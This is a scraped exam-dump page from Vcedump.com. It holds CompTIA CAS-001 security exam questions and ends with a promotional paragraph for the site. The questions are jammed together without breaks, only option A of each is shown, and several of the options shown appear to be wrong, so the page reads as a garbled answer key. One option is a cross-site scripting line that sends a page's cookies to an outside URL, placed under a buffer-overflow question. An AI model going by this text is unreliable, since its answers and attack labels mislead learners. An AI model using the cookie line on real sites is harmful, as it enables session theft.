An administrator has four virtual guests on a host server. Two of the servers are corporate SQL servers, one is a corporate mail server, and one is a testing web server for a small group of developers. The administrator is experiencing difficulty connecting to the host server during peak network usage times.
Which of the following would allow the administrator to securely connect to and manage the host server during peak usage times?
A. Increase the virtual RAM allocation to high I/O servers.The Chief Executive Officer (CEO) of a corporation decided to move all email to a cloud computing environment. The Chief Information Security Officer (CISO) was told to research the risk involved in this environment. Which of the following measures should be implemented to minimize the risk of hosting email in the cloud?
A. Remind users that all emails with sensitive information need be encrypted and physically inspect the cloud computing.New zero-day attacks are announced on a regular basis against a broad range of technology systems.
Which of the following best practices should a security manager do to manage the risks of these attack vectors? (Select TWO).
A. Establish an emergency response call tree.Which of the following displays an example of a buffer overflow attack?
A. document.location='http://site.comptia/cgi-bin/script.cgi?'+document.cookieA Chief Information Security Officer (CISO) has been trying to eliminate some IT security risks for several months. These risks are not high profile but still exist. Furthermore, many of these risks have been mitigated with innovative solutions. However, at this point in time, the budget is insufficient to deal with the risks.
Which of the following risk strategies should be used?
A. Transfer the risksThere has been a recent security breach which has led to the release of sensitive customer information. As part of improving security and reducing the disclosure of customer data, a training company has been employed to educate staff. Which of the following should be the primary focus of the privacy compliance training program?
A. Explain how customer data is gathered, used, disclosed, and managed.Which of the following does SAML uses to prevent government auditors or law enforcement from identifying specific entities as having already connected to a service provider through an SSO operation?
A. Transient identifiersCompany A is merging with Company B. Company B uses mostly hosted services from an outside vendor, while Company A uses mostly in-house products. The project manager of the merger states the merged systems should meet these goals:

Ability to customize systems per department

Quick implementation along with an immediate ROI

The internal IT team having administrative level control over all products
The project manager states the in-house services are the best solution. Because of staff shortages, the senior security administrator argues that security will be best maintained by continuing to use outsourced services.
Which of the following solutions BEST solves the disagreement?
A. Raise the issue to the Chief Executive Officer (CEO) to escalate the decision to senior management with the recommendation to continue the outsourcing of all IT services.An organization would like to allow employees to use their network username and password to access a third-party service. The company is using Active Directory Federated Services for their directory service. Which of the following should the company ensure is supported by the third- party? (Select TWO).
A. LDAP/SA database administrator comes across the below records in one of the databases during an internal audit of the payment system:
UserID Address Credit Card No. Password jsmith 123 fake street 55XX-XXX-XXXX-1397 Password100 jqdoe 234 fake street 42XX-XXX-XXXX-2027 17DEC12 From a security perspective, which of the following should be the administrator's GREATEST concern, and what will correct the concern?
A. Concern: Passwords are stored in plain text. Correction: Require a minimum of 8 alphanumeric characters and hash the password.Nowadays, the certification exams become more and more important and required by more and more enterprises when applying for a job. But how to prepare for the exam effectively? How to prepare for the exam in a short time with less efforts? How to get a ideal result and how to find the most reliable resources? Here on Vcedump.com, you will find all the answers. Vcedump.com provide not only CompTIA exam questions, answers and explanations but also complete assistance on your exam preparation and certification application. If you are confused on your CAS-001 exam preparations and CompTIA certification application, do not hesitate to visit our Vcedump.com to find your solutions here.